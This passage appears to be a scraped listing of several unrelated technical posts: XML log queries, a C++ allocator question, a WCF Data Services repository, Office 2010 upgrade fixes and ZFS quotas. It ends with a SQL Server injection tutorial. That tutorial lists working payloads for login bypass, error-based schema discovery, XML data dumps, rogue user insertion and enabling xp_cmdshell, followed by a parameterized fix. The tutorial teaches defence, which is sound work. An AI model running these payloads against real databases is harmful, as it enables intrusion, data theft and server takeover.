z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Getting message digest component for algorithm MD5</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Completed getting message digest component</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>getDigest() 0</m></e> ...... </log> Essentialy I want to select some m-nodes (and I know the XPath is wrong for that, it was just a quick hack), but maintain the XML layout. EDIT: It appears that STX may be what I am looking for (I can live with another transformation language), and that Joost is an implementation hereof. Any experiences? EDIT: I found that Saxon 6.5.4 with -Xmx1500m could load my XML, so this allowed me to use my XPaths right now. This is just a lucky stroke so I'd still like to solve this generically - this means scriptable which in turn means no handcrafted Java filtering first. EDIT: Oh, by the way. This is a log file very similar to what is generated by the log4j XMLLayout. The reason for XML is to be able to do exactly this, namely do queries on the log. This is the initial try, hence the simple question. Later I'd like to be able to ask more complex questions - therefore I'd like the query language to be able to handle the input file.

    Read the article

  • Problem with incomplete type while trying to detect existence of a member function

    - by abir
    I was trying to detect existence of a member function for a class where the function tries to use an incomplete type. The typedef is struct foo; typedef std::allocator<foo> foo_alloc; The detection code is struct has_alloc { template<typename U,U x> struct dummy; template<typename U> static char check(dummy<void* (U::*)(std::size_t),&U::allocate>*); template<typename U> static char (&check(...))[2]; const static bool value = (sizeof(check<foo_alloc>(0)) == 1); }; So far I was using incomplete type foo with std::allocator without any error on VS2008. However when I replaced it with nearly an identical implementation as template<typename T> struct allocator { T* allocate(std::size_t n) { return (T*)operator new (sizeof(T)*n); } }; it gives an error saying that as T is incomplete type it has problem instantiating allocator<foo> because allocate uses sizeof. GCC 4.5 with std::allocator also gives the error, so it seems during detection process the class need to be completely instantiated, even when I am not using that function at all. What I was looking for is void* allocate(std::size_t) which is different from T* allocate(std::size_t). My questions are (I have three questions, but as they are correlated , so I thought it is better not to create three separate questions). Why MS std::allocator doesn't check for incomplete type foo while instantiating? Are they following any trick which can be implemented ? Why the compiler need to instantiate allocator<T> to check the existence of the function when sizeof is not used as sfinae mechanism to remove/add allocate in the overload resolutions set? It should be noted that, if I remove the generic implementation of allocate leaving the declaration only, and specialized it for foo afterwards such as struct foo{}; template< struct allocator { foo* allocate(std::size_t n) { return (foo*)operator new (sizeof(foo)*n); } }; after struct has_alloc it compiles in GCC 4.5 while gives error in VS2008 as allocator<T> is already instantiated and explicit specialization for allocator<foo> already defined. Is it legal to use nested types for an std::allocator of incomplete type such as typedef foo_alloc::pointer foo_pointer; ? Though it is practically working for me, I suspect the nested types such as pointer may depend on completeness of type it takes. It will be good to know if there is any possible way to typedef such types as foo_pointer where the type pointer depends on completeness of foo. NOTE : As the code is not copy paste from editor, it may have some syntax error. Will correct it if I find any. Also the codes (such as allocator) are not complete implementation, I simplified and typed only the portion which I think useful for this particular problem.

    Read the article

  • Implementing a generic repository for WCF data services

    - by cibrax
    The repository implementation I am going to discuss here is not exactly what someone would call repository in terms of DDD, but it is an abstraction layer that becomes handy at the moment of unit testing the code around this repository. In other words, you can easily create a mock to replace the real repository implementation. The WCF Data Services update for .NET 3.5 introduced a nice feature to support two way data bindings, which is very helpful for developing WPF or Silverlight based application but also for implementing the repository I am going to talk about. As part of this feature, the WCF Data Services Client library introduced a new collection DataServiceCollection<T> that implements INotifyPropertyChanged to notify the data context (DataServiceContext) about any change in the association links. This means that it is not longer necessary to manually set or remove the links in the data context when an item is added or removed from a collection. Before having this new collection, you basically used the following code to add a new item to a collection. Order order = new Order {   Name = "Foo" }; OrderItem item = new OrderItem {   Name = "bar",   UnitPrice = 10,   Qty = 1 }; var context = new OrderContext(); context.AddToOrders(order); context.AddToOrderItems(item); context.SetLink(item, "Order", order); context.SaveChanges(); Now, thanks to this new collection, everything is much simpler and similar to what you have in other ORMs like Entity Framework or L2S. Order order = new Order {   Name = "Foo" }; OrderItem item = new OrderItem {   Name = "bar",   UnitPrice = 10,   Qty = 1 }; order.Items.Add(item); var context = new OrderContext(); context.AddToOrders(order); context.SaveChanges(); In order to use this new feature, you first need to enable V2 in the data service, and then use some specific arguments in the datasvcutil tool (You can find more information about this new feature and how to use it in this post). DataSvcUtil /uri:"http://localhost:3655/MyDataService.svc/" /out:Reference.cs /dataservicecollection /version:2.0 Once you use those two arguments, the generated proxy classes will use DataServiceCollection<T> rather than a simple ObjectCollection<T>, which was the default collection in V1. There are some aspects that you need to know to use this feature correctly. 1. All the entities retrieved directly from the data context with a query track the changes and report those to the data context automatically. 2. A entity created with “new” does not track any change in the properties or associations. In order to enable change tracking in this entity, you need to do the following trick. public Order CreateOrder() {   var collection = new DataServiceCollection<Order>(this.context);   var order = new Order();   collection.Add(order);   return order; } You basically need to create a collection, and add the entity to that collection with the “Add” method to enable change tracking on that entity. 3. If you need to attach an existing entity (For example, if you created the entity with the “new” operator rather than retrieving it from the data context with a query) to a data context for tracking changes, you can use the “Load” method in the DataServiceCollection. var order = new Order {   Id = 1 }; var collection = new DataServiceCollection<Order>(this.context); collection.Load(order); In this case, the order with Id = 1 must exist on the data source exposed by the Data service. Otherwise, you will get an error because the entity did not exist. These cool extensions methods discussed by Stuart Leeks in this post to replace all the magic strings in the “Expand” operation with Expression Trees represent another feature I am going to use to implement this generic repository. Thanks to these extension methods, you could replace the following query with magic strings by a piece of code that only uses expressions. Magic strings, var customers = dataContext.Customers .Expand("Orders")         .Expand("Orders/Items") Expressions, var customers = dataContext.Customers .Expand(c => c.Orders.SubExpand(o => o.Items)) That query basically returns all the customers with their orders and order items. Ok, now that we have the automatic change tracking support and the expression support for explicitly loading entity associations, we are ready to create the repository. The interface for this repository looks like this,public interface IRepository { T Create<T>() where T : new(); void Update<T>(T entity); void Delete<T>(T entity); IQueryable<T> RetrieveAll<T>(params Expression<Func<T, object>>[] eagerProperties); IQueryable<T> Retrieve<T>(Expression<Func<T, bool>> predicate, params Expression<Func<T, object>>[] eagerProperties); void Attach<T>(T entity); void SaveChanges(); } The Retrieve and RetrieveAll methods are used to execute queries against the data service context. While both methods receive an array of expressions to load associations explicitly, only the Retrieve method receives a predicate representing the “where” clause. The following code represents the final implementation of this repository.public class DataServiceRepository: IRepository { ResourceRepositoryContext context; public DataServiceRepository() : this (new DataServiceContext()) { } public DataServiceRepository(DataServiceContext context) { this.context = context; } private static string ResolveEntitySet(Type type) { var entitySetAttribute = (EntitySetAttribute)type.GetCustomAttributes(typeof(EntitySetAttribute), true).FirstOrDefault(); if (entitySetAttribute != null) return entitySetAttribute.EntitySet; return null; } public T Create<T>() where T : new() { var collection = new DataServiceCollection<T>(this.context); var entity = new T(); collection.Add(entity); return entity; } public void Update<T>(T entity) { this.context.UpdateObject(entity); } public void Delete<T>(T entity) { this.context.DeleteObject(entity); } public void Attach<T>(T entity) { var collection = new DataServiceCollection<T>(this.context); collection.Load(entity); } public IQueryable<T> Retrieve<T>(Expression<Func<T, bool>> predicate, params Expression<Func<T, object>>[] eagerProperties) { var entitySet = ResolveEntitySet(typeof(T)); var query = context.CreateQuery<T>(entitySet); foreach (var e in eagerProperties) { query = query.Expand(e); } return query.Where(predicate); } public IQueryable<T> RetrieveAll<T>(params Expression<Func<T, object>>[] eagerProperties) { var entitySet = ResolveEntitySet(typeof(T)); var query = context.CreateQuery<T>(entitySet); foreach (var e in eagerProperties) { query = query.Expand(e); } return query; } public void SaveChanges() { this.context.SaveChanges(SaveChangesOptions.Batch); } } For instance, you can use the following code to retrieve customers with First name equal to “John”, and all their orders in a single call. repository.Retrieve<Customer>(    c => c.FirstName == “John”, //Where    c => c.Orders.SubExpand(o => o.Items)); In case, you want to have some pre-defined queries that you are going to use across several places, you can put them in an specific class. public static class CustomerQueries {   public static Expression<Func<Customer, bool>> LastNameEqualsTo(string lastName)   {     return c => c.LastName == lastName;   } } And then, use it with the repository. repository.Retrieve<Customer>(    CustomerQueries.LastNameEqualsTo("foo"),    c => c.Orders.SubExpand(o => o.Items));

    Read the article

  • Fix Problems Upgrading Office 2010 Beta to RTM (Final) Release

    - by Mysticgeek
    There are several scenarios where you may run into trouble uninstalling the 2010 Beta and trying to install the RTM (final) release. Today we’ll cover the problems we ran into, and how to fix them. You would think upgrading from the Office 2010 Beta to the final release would be an easy process. Unfortunately, it’s not always that simple. In fact, we ran into three different scenarios where the install wasn’t smooth whatsoever. If you currently have the 2010 Beta installed, you have to remove it before you can install the RTM.  Here we’ll take a look at three different troublesome install scenarios we ran into, and how we fixed each one. Important Note: Before proceeding with any of these steps, make sure and backup your Outlook .pst files! Scenario 1 – Uninstall Office 2010 Beta & Fix Install Errors In this first scenario we have Office Professional Plus 2010 Beta 32-bit installed on a Windows 7 Home Premium 32-bit system. First try to uninstall the Office 2010 Beta by going into Control Panel and selecting Programs and Features. Scroll down to Microsoft Office Professional Plus 2010, right-click it and select Uninstall. Click Yes when the confirmation dialog box comes up. Wait while Office 2010 Beta uninstalls…the amount of time it takes will vary from system to system. To complete the uninstall process, a reboot is required. Fixing Setup Errors The problem is when you start the installation of the 2010 RTM… You get the following setup error even though you uninstalled the 2010 Beta. The problem is there are leftover Office apps or stand alone Office products. So, we need a utility that will clean them up for us.   Windows Installer Clean Up Utility Download and install the Clean Up Utility (link Below) following the defaults. After it’s installed you’ll find it in Start \ All Programs \ Windows Install Clean Up …go ahead and launch the utility. Now go through and remove all Office Programs or addins that you find in the list. Make sure you are just deleting Office apps and not something you need like Java for example. If you’re not sure what something is, doing a quick Google search should help you out. For instance we had the Office labs Ribbon Hero installed… just highlight and click Remove. Remove anything that has something to do with Office…then reboot your machine. Now, you should be able to begin the installation of Office 2010 RTM (Final) Release without any errors. If you do get an error during the install process, like this one telling us we have old version of Groove Server… Navigate to C:\Users\username\AppData\Local\Microsoft (where username is the computer name) and delete any existing MS Office folders. Then try the install again, this solved the problem in our first scenario. Scenario 2 – Not Being Able to Uninstall 2010 Beta from Programs and Features In this next scenario we have Office Professional Plus 2010 Beta 32-bit installed on a Windows 7 Home Premium 32-bit system. Another problem we ran into is not being able to uninstall the 2010 Beta from Programs and Features. When you go in to uninstall it, nothing happens. If you run into this problem, we again need to download and install the Windows Installer Clean Up Utility (link below) and manually uninstall the Beta. When you launch it, scroll down to Microsoft Office Professional Plus 2010 (Beta), highlight it and click Remove.   Click OK to the Warning Dialog box… If you see any other Office 2010, 2007, or 2003 entries you can hold the “Shift” key and highlight them all…then click Remove and click OK to the warning dialog. Now we need to delete some Registry settings. Click on Start and type regedit into the Search box and hit Enter. Navigate to HKEY_CURRENT_USER \ Software \ Microsoft \ Office and delete the folder. Then navigate to HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Office and delete those keys as well. Now go into C:\Program Files and find any of these three folders…Microsoft Office, OfficeUpdate, or OfficeUpdate14…you might find one, two or all three. Either way just rename the folders with “_OLD” (without quotes) at the end. Then go into C:\Users\username\AppData\Local\Microsoft and delete any existing MS Office folders. Where in this example we have office, Office Labs, One Note…etc. Now we want to delete the contents of the Temp folder. Click on Start and type %temp% into the Search box and hit Enter. Use the key combination “Ctrl+A” to select all the files in this folder, then right-click and click Delete, or simply hit the Delete key. If you have some files that won’t delete, just skip them as they shouldn’t affect the Office install. Then empty the Recycle Bin and restart your machine. When you get back from the restart launch the Office 2010 RTM installer and you should be good to go with installation. Because we uninstalled the Office 2010 Beta manually, you may have some lingering blank icons that you’ll need to clean up. Scenario –3 Uninstall 2007 and Install 2010 32-Bit on x64 Windows 7 For this final scenario we are uninstalling Office Professional 2007 and installing Office Professional Plus 2010 32-Bit edition on a Windows Ultimate 64-bit computer. This machine actually had Office 2010 Beta 64-bit installed at one point also, it’s since been removed, and 2007 was reinstalled.  Go into Programs and Settings and uninstall Microsoft Office Professional 2007. Click Yes to the dialog box asking if you’re sure you want to uninstall it… Then wait while Office 2007 is uninstalled. The amount of time it takes will vary between systems. A restart is required to complete the process… Again we need to call upon the Windows Installer Clean Up Utility. Go through and delete any left over Office 2007 and 2010 entries. Click OK to the warning dialog that comes up. After that’s complete, navigate to HKEY_CURRENT_USER \ Software \ Microsoft \ Office and delete the folder. Then navigate to HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Office and delete those keys as well. We still need to go into C:\Users\ username\AppData\ Local\ Microsoft (where username is the computer name) and delete any Office folders. In this example we have Outlook Connector, Office, and Outlook to delete. Now let’s delete the contents of the Temp folder by typing %temp% into the Search box in the Start Menu. Then delete all of the files and folders in the Temp directory. If you have some files that won’t delete, just skip them as they shouldn’t affect the Office install. Then empty the Recycle Bin and restart your machine. If you try to install the 2010 RTM at this point you might be able to begin the install, but may get the following Error 1402 message. To solve this issue, we opened the command prompt and ran the following: secedit /configure /cfg %windir%\inf\defltbase.inf /db defltbase.sdb /verbose After the command completes, kick off the Office 2010 (Final) RTM 32-bit edition. This solved the issue and Office 2010 installed successfully.   Conclusion Except for the final scenario, we found using the Windows Installer Clean Up Utility to come in very handy. Using that along with deleting a couple folders and registry settings did the trick. In the last one, we had to get a bit more geeky and use some command line magic, but it got the job done. After some extensive testing in our labs, the only time the upgrade to the RTM went smoothly was when we had a clean Vista or Windows 7 system with a fresh install of the 2010 beta only. However, chances are you went from 2003 or 2007 to the free 2010 Beta. You might also have addins or other Office products installed, so there are going to be a lot of different office files scattered throughout your PC. If that’s the case, you may run into the issues we covered here. These are a few scenarios where we got errors and were not able to install Office 2010 after removing the beta. There could be other problems, and if any of you have experienced different issues or have more good suggestions, leave a comment and let us know! Link Download Windows Installer Clean Up Utility Similar Articles Productive Geek Tips Remove Office 2010 Beta and Reinstall Office 2007How to Upgrade the Windows 7 RC to RTM (Final Release)Upgrading Ubuntu from Dapper to Edgy with Update ManagerDisable Office 2010 Beta Send-a-Smile from StartupAdd or Remove Apps from the Microsoft Office 2007 or 2010 Suite TouchFreeze Alternative in AutoHotkey The Icy Undertow Desktop Windows Home Server – Backup to LAN The Clear & Clean Desktop Use This Bookmarklet to Easily Get Albums Use AutoHotkey to Assign a Hotkey to a Specific Window Latest Software Reviews Tinyhacker Random Tips DVDFab 6 Revo Uninstaller Pro Registry Mechanic 9 for Windows PC Tools Internet Security Suite 2010 Case Study – How to Optimize Popular Wordpress Sites Restore Hidden Updates in Windows 7 & Vista Iceland an Insurance Job? Find Downloads and Add-ins for Outlook Recycle ! Find That Elusive Icon with FindIcons

    Read the article

  • Quotas - Using quotas on ZFSSA shares and projects and users

    - by Steve Tunstall
    So you don't want your users to fill up your entire storage pool with their MP3 files, right? Good idea to make some quotas. There's some good tips and tricks here, including a helpful workflow (a script) that will allow you to set a default quota on all of the users of a share at once. Let's start with some basics. I mad a project called "small" and inside it I made a share called "Share1". You can set quotas on the project level, which will affect all of the shares in it, or you can do it on the share level like I am here. Go the the share's General property page. First, I'm using a Windows client, so I need to make sure I have my SMB mountpoint. Do you know this trick yet? Go to the Protocol page of the share. See the SMB section? It needs a resource name to make the UNC path for the SMB (Windows) users. You do NOT have to type this name in for every share you make! Do this at the Project level. Before you make any shares, go to the Protocol properties of the Project, and set the SMB Resource name to "On". This special code will automatically make the SMB resource name of every share in the project the same as the share name. Note the UNC path name I got below. Since I did this at the Project level, I didn't have to lift a finger for it to work on every share I make in this project. Simple. So I have now mapped my Windows "Z:" drive to this Share1. I logged in as the user "Joe". Note that my computer shows my Z: drive as 34GB, which is the entire size of my Pool that this share is in. Right now, Joe could fill this drive up and it would fill up my pool.  Now, go back to the General properties of Share1. In the "Space Usage" area, over on the right, click on the "Show All" text under the Users & Groups section. Sure enough, Joe and some other users are in here and have some data. Note this is also a handy window to use just to see how much space your users are using in any given share.  Ok, Joe owes us money from lunch last week, so we want to give him a quota of 100MB. Type his name in the Users box. Notice how it now shows you how much data he's currently using. Go ahead and give him a 100M quota and hit the Apply button. If I go back to "Show All", I can see that Joe now has a quota, and no one else does. Sure enough, as soon as I refresh my screen back on Joe's client, he sees that his Z: drive is now only 100MB, and he's more than half way full.  That was easy enough, but what if you wanted to make the whole share have a quota, so that the share itself, no matter who uses it, can only grow to a certain size? That's even easier. Just use the Quota box on the left hand side. Here, I use a Quota on the share of 300MB.  So now I log off as Joe, and log in as Steve. Even though Steve does NOT have a quota, it is showing my Z: drive as 300MB. This would effect anyone, INCLUDING the ROOT user, becuase you specified the Quota to be on the SHARE, not on a person.  Note that back in the Share, if you click the "Show All" text, the window does NOT show Steve, or anyone else, to have a quota of 300MB. Yet we do, because it's on the share itself, not on any user, so this panel does not see that. Ok, here is where it gets FUN.... Let's say you do NOT want a quota on the SHARE, because you want SOME people, like Root and yourself, to have FULL access to it and you want the ability to fill the whole thing up if you darn well feel like it. HOWEVER, you want to give the other users a quota. HOWEVER you have, say, 200 users, and you do NOT feel like typing in each of their names and giving them each a quota, and they are not all members of a AD global group you could use or anything like that.  Hmmmmmm.... No worries, mate. We have a handy-dandy script that can do this for us. Now, this script was written a few years back by Tim Graves, one of our ZFSSA engineers out of the UK. This is not my script. It is NOT supported by Oracle support in any way. It does work fine with the 2011.1.4 code as best as I can tell, but Oracle, and I, are NOT responsible for ANYTHING that you do with this script. Furthermore, I will NOT give you this script, so do not ask me for it. You need to get this from your local Oracle storage SC. I will give it to them. I want this only going to my fellow SCs, who can then work with you to have it and show you how it works.  Here's what it does...Once you add this workflow to the Maintenance-->Workflows section, you click it once to run it. Nothing seems to happen at this point, but something did.   Go back to any share or project. You will see that you now have four new, custom properties on the bottom.  Do NOT touch the bottom two properties, EVER. Only touch the top two. Here, I'm going to give my users a default quota of about 40MB each. The beauty of this script is that it will only effect users that do NOT already have any kind of personal quota. It will only change people who have no quota at all. It does not effect the Root user.  After I hit Apply on the Share screen. Nothing will happen until I go back and run the script again. The first time you run it, it creates the custom properties. The second and all subsequent times you run it, it checks the shares for any users, and applies your quota number to each one of them, UNLESS they already have one set. Notice in the readout below how it did NOT apply to my Joe user, since Joe had a quota set.  Sure enough, when I go back to the "Show All" in the share properties, all of the users who did not have a quota, now have one for 39.1MB. Hmmm... I did my math wrong, didn't I?    That's OK, I'll just change the number of the Custom Default quota again. Here, I am adding a zero on the end.  After I click Apply, and then run the script again, all of my users, except Joe, now have a quota of 391MB  You can customize a person at any time. Here, I took the Steve user, and specifically gave him a Quota of zero. Now when I run the script again, he is different from the rest, so he is no longer effected by the script. Under Show All, I see that Joe is at 100, and Steve has no Quota at all. I can do this all day long. es, you will have to re-run the script every time new users get added. The script only applies the default quota to users that are present at the time the script is ran. However, it would be a simple thing to schedule the script to run each night, or to make an alert to run the script when certain events occur.  For you power users, if you ever want to delete these custom properties and remove the script completely, you will find these properties under the "Schema" section under the Shares section. You can remove them here. There's no need to, however, they don't hurt a thing if you just don't use them.  I hope these tips have helped you out there. Quotas can be fun. 

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

< Previous Page | 73 74 75 76 77 78 79 80  | Next Page >